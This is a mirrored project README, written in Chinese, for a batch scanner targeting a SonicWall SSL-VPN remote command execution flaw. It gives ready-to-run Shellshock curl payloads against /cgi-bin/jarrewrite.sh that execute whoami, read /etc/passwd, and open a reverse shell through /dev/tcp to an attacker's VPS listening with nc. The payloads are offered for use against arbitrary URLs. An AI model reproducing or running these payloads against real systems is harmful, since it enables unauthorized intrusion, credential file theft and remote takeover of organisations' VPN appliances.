Coder Social home page Coder Social logo

sonicwallssl-vpn_rce's Introduction

SonicWallSSL-VPN_RCE

一个简单的SonicWallSSL-VPN远程命令执行批量检测脚本

脚本写得比较简单,主要是对于批量url检测比较实用

用法:将需要检测的url放入同一目录下的url.txt中

执行

python3 SonicWallSSL-VPN_RCE.py

单个url检测直接在命令行检测即可,

比如:

命令执行:

curl -A "() { :; }; echo ; /bin/bash -c 'whoami'" https://x.x.x.x/cgi-bin/jarrewrite.sh -k

curl -A "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" https://x.x.x.x/cgi-bin/jarrewrite.sh -k

反弹shell:

VPS nc监听1234端口,

然后

curl -A "() { :; }; echo ; /bin/bash -c ' bash -i >& /dev/tcp/VPS的IP/1234 0>&1 '" https://x.x.x.x/cgi-bin/jarrewrite.sh -k

sonicwallssl-vpn_rce's People

Contributors

luodameinv avatar

Stargazers

链栈 avatar  avatar lif3reb00t avatar Abell avatar  avatar

Watchers

 avatar

Forkers

dinarpay

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.